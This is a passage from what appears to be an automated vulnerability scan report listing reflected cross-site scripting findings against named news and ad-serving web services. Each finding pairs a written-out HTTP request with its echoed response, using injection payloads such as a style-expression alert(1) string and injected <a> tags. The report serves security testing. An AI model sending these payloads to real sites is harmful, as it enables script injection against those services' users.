P3P: policyref="http://www.collective.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 7288
Date: Fri, 26 Nov 2010 20:41:27 GMT
Connection: close

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-7978060_1290804087","http://ad.doubleclick.net//cm.ny_post/tier2_082410?646e9'-alert(1)-'9979033da62=1;net=cm;u=,cm-7978060_1290804087,11bbcecf1d09b9d,none,cm.sportsreg-cm.sportsfan-cm.cm_aa_gn1-cm.pb8k-cm.biz_l-cm.ent_l-cm.sports_h-cm.none_h;;contx=none;dc=d;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.
...[SNIP]...

1.19. http://nypost.newspaperdirect.com/epaper/helpandsupport.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nypost.newspaperdirect.com
Path:   /epaper/helpandsupport.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a253b"style%3d"x%3aexpression(alert(1))"7663e53443 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a253b"style="x:expression(alert(1))"7663e53443 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /epaper/helpandsupport.aspx?a253b"style%3d"x%3aexpression(alert(1))"7663e53443=1 HTTP/1.1
Host: nypost.newspaperdirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=86400
Content-Type: text/html; charset=utf-8
Expires: Sat, 27 Nov 2010 20:33:00 GMT
Last-Modified: Fri, 26 Nov 2010 20:33:00 GMT
Vary: Host
Server: Microsoft-IIS/7.5
Set-Cookie: AProfile=tsHwCZzNSV+W7b9EmVkHefNppQo=; expires=Mon, 26-Nov-2040 20:33:00 GMT; path=/epaper/
X-AspNet-Version: 4.0.30319
wc: 1
Date: Fri, 26 Nov 2010 20:32:59 GMT
Connection: close
Content-Length: 15938


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><meta http-equiv="content-type" content="text/html;charset=UTF-8"><script type="text/javascript">
window.NDScriptsVers
...[SNIP]...
<a title="Overview" href="/epaper/helpandsupport.aspx?subpage=PressdisplayOverview&a253b"style="x:expression(alert(1))"7663e53443=1">
...[SNIP]...

1.20. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/AdServerService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/AdServerService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3e105<a>33f0a8af8c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/AdServerService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252&3e105<a>33f0a8af8c1=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Fri, 26 Nov 2010 20:30:32 GMT
Content-Length: 1913
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252&3e105<a>33f0a8af8c1=1/AdServerService.asmx" />
...[SNIP]...

1.21. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/AdServerService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/AdServerService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload e9c61<a>9670bb58e0a was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/AdServerService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252e9c61<a>9670bb58e0a HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Fri, 26 Nov 2010 20:30:31 GMT
Content-Length: 1907
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252e9c61<a>9670bb58e0a/AdServerService.asmx" />
...[SNIP]...

1.22. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ChannelInfoService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ChannelInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 499b3<a>dcd1813efb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ChannelInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252&499b3<a>dcd1813efb4=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:06 GMT
Connection: close
Content-Length: 20181

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252&499b3<a>dcd1813efb4=1/ChannelInfoService.asmx" />
...[SNIP]...

1.23. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ChannelInfoService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ChannelInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 55e32<a>b0a7e7053a6 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ChannelInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-21325255e32<a>b0a7e7053a6 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:05 GMT
Connection: close
Content-Length: 20169

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-21325255e32<a>b0a7e7053a6/ChannelInfoService.asmx" />
...[SNIP]...

1.24. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ClipInfoService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ClipInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 86602<a>17f7a325ea4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ClipInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252&86602<a>17f7a325ea4=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Fri, 26 Nov 2010 20:30:36 GMT
Content-Length: 22408
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252&86602<a>17f7a325ea4=1/ClipInfoService.asmx" />
...[SNIP]...

1.25. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ClipInfoService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ClipInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 1f67b<a>4080466a88e was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ClipInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-2132521f67b<a>4080466a88e HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Fri, 26 Nov 2010 20:30:34 GMT
Content-Length: 22396
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-2132521f67b<a>4080466a88e/ClipInfoService.asmx" />
...[SNIP]...

1.26. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ErrorInfoService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ErrorInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload eca17<a>d5af7663947 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ErrorInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252&eca17<a>d5af7663947=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Fri, 26 Nov 2010 20:30:35 GMT
Content-Length: 5637
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252&eca17<a>d5af7663947=1/ErrorInfoService.asmx" />
...[SNIP]...

1.27. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ErrorInfoService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ErrorInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 4a37d<a>1d8010bbad2 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/ErrorInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-2132524a37d<a>1d8010bbad2 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Fri, 26 Nov 2010 20:30:32 GMT
Content-Length: 5625
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-2132524a37d<a>1d8010bbad2/ErrorInfoService.asmx" />
...[SNIP]...

1.28. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/PlaylistInfoService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/PlaylistInfoService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f0c3f<a>b85df024540 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/PlaylistInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252&f0c3f<a>b85df024540=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:06 GMT
Connection: close
Content-Length: 27398

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252&f0c3f<a>b85df024540=1/PlaylistInfoService.asmx" />
...[SNIP]...

1.29. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/PlaylistInfoService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/PlaylistInfoService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 90605<a>9c366260d50 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/PlaylistInfoService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-21325290605<a>9c366260d50 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Proxy-Connection: keep-alive
Referer: http://publish.vx.roo.com/nypost/filmstrip/flashembed/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Vary: Accept-Encoding
Date: Fri, 26 Nov 2010 20:22:05 GMT
Connection: close
Content-Length: 27386

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-21325290605<a>9c366260d50/PlaylistInfoService.asmx" />
...[SNIP]...

1.30. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/RSSService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/RSSService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3c8c7<a>6613c325b13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/RSSService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252&3c8c7<a>6613c325b13=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Fri, 26 Nov 2010 20:30:34 GMT
Content-Length: 8814
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252&3c8c7<a>6613c325b13=1/RSSService.asmx" />
...[SNIP]...

1.31. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/RSSService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/RSSService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 4e1f6<a>5758be85cbc was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/RSSService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-2132524e1f6<a>5758be85cbc HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Fri, 26 Nov 2010 20:30:32 GMT
Content-Length: 8802
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-2132524e1f6<a>5758be85cbc/RSSService.asmx" />
...[SNIP]...

1.32. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/RatingService.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/RatingService.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload de428<a>8a3413ae47b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/RatingService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252&de428<a>8a3413ae47b=1 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Fri, 26 Nov 2010 20:30:36 GMT
Content-Length: 5534
Connection: close

<?xml version="1.0" encoding="utf-8"?><wsdl:definitions xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" xmlns:tm="http://microsoft.com/wsdl/mime/textMatching/" xmlns:soapenc="http://schemas.xmlsoap
...[SNIP]...
<soap:address location="http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252&de428<a>8a3413ae47b=1/RatingService.asmx" />
...[SNIP]...

1.33. http://publish.flashapi.vx.roo.com/fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/RatingService.aspx [siteid parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://publish.flashapi.vx.roo.com
Path:   /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/RatingService.aspx

Issue detail

The value of the siteid request parameter is copied into the HTML document as plain text between tags. The payload 99e97<a>0a8fa2f50b9 was submitted in the siteid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-213252/RatingService.aspx?siteid=fe3e21a8-49f1-4cec-9ba5-cfe372fa6572-21325299e97<a>0a8fa2f50b9 HTTP/1.1
Host: publish.flashapi.vx.roo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Date: Fri, 26 Nov 2010 20:30:31 GMT
Content-Length: 5522
Connection: close

